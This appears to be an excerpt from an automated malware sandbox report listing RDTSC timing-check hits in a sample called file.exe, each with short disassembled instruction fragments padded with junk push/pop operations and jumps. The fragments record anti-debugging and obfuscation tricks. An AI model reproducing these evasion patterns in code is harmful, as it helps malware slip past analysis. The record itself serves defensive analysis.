              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9906F1 second address: 9906FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990CAA second address: 990CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990CB0 second address: 990CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E04 second address: 990E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007FC7B8E46E46h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E13 second address: 990E34 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7B8E88BFCh 0x00000008 jmp 00007FC7B8E88BFBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E34 second address: 990E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E4C second address: 990E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC7B8E88BF6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E5A second address: 990E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E5E second address: 990E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7B8E88BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E6A second address: 990E84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E54h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990E84 second address: 990E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99559E second address: 9955A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965461 second address: 9654DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E88C07h 0x00000008 jmp 00007FC7B8E88C01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FC7B8E88C01h 0x00000015 nop 0x00000016 adc edi, 0C9E6CB4h 0x0000001c lea eax, dword ptr [ebp+1248C20Bh] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FC7B8E88BF8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c jmp 00007FC7B8E88C06h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9654DB second address: 944181 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FC7B8E46E4Ch 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC7B8E46E48h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D3444h], edx 0x00000034 pushad 0x00000035 stc 0x00000036 and esi, 03504934h 0x0000003c popad 0x0000003d call dword ptr [ebp+122D2AEAh] 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push eax 0x00000047 pop eax 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9660DF second address: 966166 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FC7B8E88BF8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sub dword ptr [ebp+124675D0h], eax 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FC7B8E88BF8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jmp 00007FC7B8E88C05h 0x0000004a nop 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC7B8E88C04h 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966166 second address: 966178 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966178 second address: 966186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9664EF second address: 9664F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9668DC second address: 9668E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A61 second address: 966A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A65 second address: 966A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A6B second address: 966A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A70 second address: 944D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC7B8E88C02h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC7B8E88BF8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov ecx, edx 0x0000002c xor edx, dword ptr [ebp+122D371Eh] 0x00000032 lea eax, dword ptr [ebp+1248C20Bh] 0x00000038 add di, 2BDEh 0x0000003d push eax 0x0000003e jno 00007FC7B8E88C10h 0x00000044 mov dword ptr [esp], eax 0x00000047 pushad 0x00000048 mov dx, bx 0x0000004b jg 00007FC7B8E88BFCh 0x00000051 add dword ptr [ebp+122D1845h], edx 0x00000057 popad 0x00000058 cld 0x00000059 call dword ptr [ebp+1244F97Bh] 0x0000005f pushad 0x00000060 je 00007FC7B8E88BFEh 0x00000066 pushad 0x00000067 popad 0x00000068 jne 00007FC7B8E88BF6h 0x0000006e jmp 00007FC7B8E88C03h 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944D3B second address: 944D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7B8E46E46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944D47 second address: 944D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88BFEh 0x00000009 popad 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944D62 second address: 944D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F918 second address: 90F922 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F922 second address: 90F939 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7B8E46E4Ch 0x00000008 pushad 0x00000009 ja 00007FC7B8E46E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947A7 second address: 9947B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947B2 second address: 9947CF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7B8E46E46h 0x00000008 jmp 00007FC7B8E46E53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947CF second address: 9947D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947D9 second address: 9947DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947DD second address: 9947E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947E7 second address: 9947ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9947ED second address: 9947F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994974 second address: 99497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99497A second address: 994996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC7B8E88C05h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994AE2 second address: 994B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E52h 0x00000009 jmp 00007FC7B8E46E51h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994B0A second address: 994B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E88BFBh 0x00000009 jmp 00007FC7B8E88C07h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994C7A second address: 994C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC7B8E46E53h 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99519C second address: 9951AF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jng 00007FC7B8E88BF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920399 second address: 92039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92039F second address: 9203B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7B8E88C03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99DC2C second address: 99DC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99DC32 second address: 99DC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC7B8E88BF6h 0x0000000a popad 0x0000000b jmp 00007FC7B8E88C05h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E0E7 second address: 99E0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E0F4 second address: 99E0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E0F8 second address: 99E115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c jno 00007FC7B8E46E46h 0x00000012 pop esi 0x00000013 jmp 00007FC7B8E46E4Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E300 second address: 99E30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC7B8E88BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E5D2 second address: 99E5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E5D8 second address: 99E5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA6D second address: 99EA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E52h 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA87 second address: 99EA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA8E second address: 99EAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC7B8E46E53h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F209 second address: 99F247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC7B8E88BF6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FC7B8E88C02h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007FC7B8E88C08h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F247 second address: 99F24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F24D second address: 99F257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A509C second address: 9A50BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FC7B8E46E46h 0x00000009 jmp 00007FC7B8E46E51h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A50BA second address: 9A50C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9B58 second address: 9A9B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E57h 0x00000009 popad 0x0000000a jmp 00007FC7B8E46E4Dh 0x0000000f push esi 0x00000010 jg 00007FC7B8E46E46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA02 second address: 9ADA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FC7B8E88C04h 0x0000000b jp 00007FC7B8E88BF6h 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA23 second address: 9ADA35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA35 second address: 9ADA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADA3B second address: 9ADA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC7B8E46E4Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBA9 second address: 9ADBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBB2 second address: 9ADBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7B8E46E46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBBC second address: 9ADBC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FC7B8E88BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBC8 second address: 9ADBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBCD second address: 9ADBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD7A second address: 9ADD7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD7E second address: 9ADD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD84 second address: 9ADD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC7B8E46E4Ah 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE1C7 second address: 9AE1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966324 second address: 966367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC7B8E46E4Ch 0x0000000f ja 00007FC7B8E46E46h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push edi 0x0000001a mov dx, si 0x0000001d pop edx 0x0000001e mov ebx, dword ptr [ebp+1248C24Ah] 0x00000024 mov edi, dword ptr [ebp+122D389Bh] 0x0000002a add eax, ebx 0x0000002c mov edi, dword ptr [ebp+122D398Fh] 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jne 00007FC7B8E46E48h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966367 second address: 9663AC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7B8E88BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC7B8E88BFFh 0x00000010 nop 0x00000011 mov dword ptr [ebp+124675D0h], ecx 0x00000017 push 00000004h 0x00000019 mov ecx, 63673C74h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jmp 00007FC7B8E88C02h 0x00000027 pop ebx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE46A second address: 9AE47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7B8E46E46h 0x0000000a jng 00007FC7B8E46E46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE47C second address: 9AE481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE481 second address: 9AE48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FC7B8E46E46h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE48D second address: 9AE493 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEF2F second address: 9AEF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEF34 second address: 9AEF51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC7B8E88BFBh 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FC7B8E88BF6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEF51 second address: 9AEF7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7B8E46E46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC7B8E46E59h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEF7D second address: 9AEF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEF83 second address: 9AEF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1821 second address: 9B1826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1826 second address: 9B1851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC7B8E46E46h 0x0000000a js 00007FC7B8E46E46h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edi 0x00000015 jo 00007FC7B8E46E46h 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7B8E46E4Dh 0x00000023 rdtsc
